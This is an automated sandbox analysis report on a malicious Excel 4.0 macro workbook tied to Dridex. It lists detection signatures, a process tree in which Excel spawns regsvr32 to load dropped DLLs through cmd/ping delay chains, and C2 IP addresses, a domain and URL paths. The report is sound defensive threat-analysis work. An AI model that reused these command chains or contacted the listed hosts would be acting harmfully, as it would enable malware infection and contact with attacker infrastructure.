Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Documents_13134976_1377491379.xlsb

Overview

General Information

Sample Name:Documents_13134976_1377491379.xlsb
Analysis ID:431937
MD5:276bf3db434b887bb77adca0bd46e130
SHA1:eee2be9136f2c70a28b6ca5289e73e2a38453da2
SHA256:27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce
Tags:xlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates an autostart registry key pointing to binary in C:\Windows
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6528 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6796 cmdline: regsvr32 -s ..\iepfusn.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 6848 cmdline: -s ..\iepfusn.dll MD5: D78B75FC68247E8A63ACBA846182740E)
        • cmd.exe (PID: 6980 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 7032 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
          • regsvr32.exe (PID: 5712 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR MD5: D78B75FC68247E8A63ACBA846182740E)
            • cmd.exe (PID: 1724 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 6196 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
              • regsvr32.exe (PID: 6356 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG MD5: D78B75FC68247E8A63ACBA846182740E)
                • cmd.exe (PID: 6896 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                  • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                  • PING.EXE (PID: 6092 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
                  • regsvr32.exe (PID: 6824 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 6872 cmdline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 400 cmdline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: BlueMashroom DLL LoadShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, CommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5712, ProcessCommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, ProcessId: 1724
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\iepfusn.dll, CommandLine: regsvr32 -s ..\iepfusn.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6528, ProcessCommandLine: regsvr32 -s ..\iepfusn.dll, ProcessId: 6796
    Sigma detected: Regsvr32 AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, CommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6980, ProcessCommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ProcessId: 5712

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 107.180.50.232:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49750 version: TLS 1.2
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B3714 FindFirstFileExA,5_2_00007FFD696B3714
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69653714 FindFirstFileExA,11_2_00007FFD69653714

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: rtdsgfe[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficDNS query: name: tpfcu.com
    Source: global trafficTCP traffic: 192.168.2.6:49715 -> 107.180.50.232:443
    Source: global trafficTCP traffic: 192.168.2.6:49715 -> 107.180.50.232:443

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49740
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49747
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49750
    Uses ping.exe to check the status of other devices and networksShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: Joe Sandbox ViewASN Name: MIT-GATEWAYSUS MIT-GATEWAYSUS
    Source: Joe Sandbox ViewJA3 fingerprint: 8916410db85077a5460817142dcbc8de
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownDNS traffic detected: queries for: tpfcu.com
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: regsvr32.exe, 00000019.00000003.467970862.0000000000B0D000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.25.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: regsvr32.exe, 00000019.00000003.467970862.0000000000B0D000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c71b863b5b2fa
    Source: regsvr32.exe, 00000019.00000002.634452908.0000000000A78000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en9
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/
    Source: regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/#
    Source: regsvr32.exe, 00000019.00000002.636067995.00000000029E5000.00000004.00000001.sdmpString found in binary or memory: https://18.117.84.120/18.188.86.8/
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/89b
    Source: regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp, regsvr32.exe, 00000019.00000002.634483097.0000000000A9A000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/kenichi/special21new/trailer2a5
    Source: regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/kenichi/special21new/trailer2a5T0
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/Z
    Source: regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/kenichi/special21new/trailer2a5
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/railer2a55b
    Source: regsvr32.exe, 00000019.00000002.636079030.0000000002A44000.00000004.00000001.sdmpString found in binary or memory: https://18.188.86.8:443/kenichi/special21new/trailer2a55
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.office.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.onedrive.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://augloop.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.entity.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cortana.ai/api
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cr.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://directory.services.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.windows.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.windows.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows.local
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://management.azure.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://management.azure.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://messaging.office.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officeapps.live.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://onedrive.live.com
